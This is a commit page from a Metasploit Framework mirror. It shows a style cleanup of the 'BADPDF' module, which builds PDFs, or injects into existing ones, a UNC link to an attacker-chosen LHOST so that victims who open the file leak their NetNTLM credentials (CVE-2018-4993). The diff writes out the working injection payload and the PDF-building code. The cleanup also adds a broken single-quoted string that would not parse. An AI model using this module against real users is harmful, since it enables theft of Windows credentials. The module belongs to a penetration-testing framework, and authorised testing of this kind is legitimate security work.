infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Code Improvements 

Ran module through rubocop
GSoC/Meterpreter_Web_Console
rmdavy 2018-06-12 22:55:38 +01:00 committed by GitHub
parent 6b58163fde
commit 477d709ff6
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 35 additions and 36 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

37
modules/auxiliary/fileformat/badpdf.rb
View File

@ -9,11 +9,11 @@ class MetasploitModule < Msf::Auxiliary
def initialize(info = {})
super(update_info(info,
'Name' => 'BADPDF Malicious PDF Creator',
'Description' => %q{
'Description' => '
This module can either creates a blank PDF file which contains a UNC link which can be used
to capture NetNTLM credentials, or if the PDFINJECT option is used it will inject the necessary
code into an existing PDF document if possible.
},
',
'License' => MSF_LICENSE,
'Author' =>
[
@ -27,26 +27,26 @@ class MetasploitModule < Msf::Auxiliary
[
['CVE', '2018-4993'],
['URL', 'https://research.checkpoint.com/ntlm-credentials-theft-via-pdf-files/']
]
))
])
)
register_options(
[
OptAddress.new("LHOST", [ true, "Host listening for incoming SMB/WebDAV traffic", nil]),
OptString.new("FILENAME", [ false, "Filename"]),
OptPath.new("PDFINJECT", [ false, "Path and filename to existing PDF to inject UNC link code into"]),
])
OptAddress.new('LHOST', [true, 'Host listening for incoming SMB/WebDAV traffic', nil]),
OptString.new('FILENAME', [false, 'Filename']),
OptPath.new('PDFINJECT', [false, 'Path and filename to existing PDF to inject UNC link code into'])
]
)
end
def run
if datastore['PDFINJECT'].to_s.end_with?('.pdf') && datastore['FILENAME'].to_s.end_with?('.pdf')
print_error "Please configure either FILENAME or PDFINJECT"
print_error 'Please configure either FILENAME or PDFINJECT'
elsif !datastore['PDFINJECT'].nil? && datastore['PDFINJECT'].to_s.end_with?('.pdf')
injectpdf
elsif !datastore['FILENAME'].nil? && datastore['FILENAME'].to_s.end_with?('.pdf')
createpdf
else
print_error "FILENAME or PDFINJECT must end with '.pdf' file extension"
print_error 'FILENAME or PDFINJECT must end with '.pdf' file extension'
end
end
@ -55,7 +55,7 @@ class MetasploitModule < Msf::Auxiliary
inject_payload = "/AA <</O <</F (\\\\\\\\#{datastore['LHOST']}\\\\test)/D [ 0 /Fit]/S /GoToE>>>>"
# if given path doesn't exist display error and return
unless File.exists?(datastore['PDFINJECT'])
unless File.exist?(datastore['PDFINJECT'])
# If file not found display error message
print_error "File doesn't exist #{datastore['PDFINJECT']}"
return
@ -65,7 +65,7 @@ class MetasploitModule < Msf::Auxiliary
content = File.read(datastore['PDFINJECT'])
# Check for place holder - below ..should.. cover most scenarios.
newdata = ""
newdata = ''
[2, 4, 6, 8].each do |pholder|
unless content.index("/Contents #{pholder} 0 R").nil?
# If place holder exists create new file content
@ -75,8 +75,8 @@ class MetasploitModule < Msf::Auxiliary
end
# Display error message if we couldn't poison the file
if newdata.nil?
print_error "Could not find placeholder to poison file this time...."
if newdata.empty?
print_error 'Could not find placeholder to poison file this time....'
return
end
@ -85,16 +85,16 @@ class MetasploitModule < Msf::Auxiliary
# Write content to file
File.open(newfilename, 'wb') { |file| file.write(newdata) }
# Check file exists and display path or error message
if File.exists?(newfilename)
if File.exist?(newfilename)
print_good("Malicious file writen to: #{newfilename}")
else
print_error "Something went wrong creating malicious PDF file"
print_error 'Something went wrong creating malicious PDF file'
end
end
def createpdf
# Code below taken POC provided by CheckPoint Research
pdf = ""
pdf = ''
pdf << "%PDF-1.7\n"
pdf << "1 0 obj\n"
pdf << "<</Type/Catalog/Pages 2 0 R>>\n"
@ -155,5 +155,4 @@ class MetasploitModule < Msf::Auxiliary
# Write data to filename
file_create(pdf)
end
end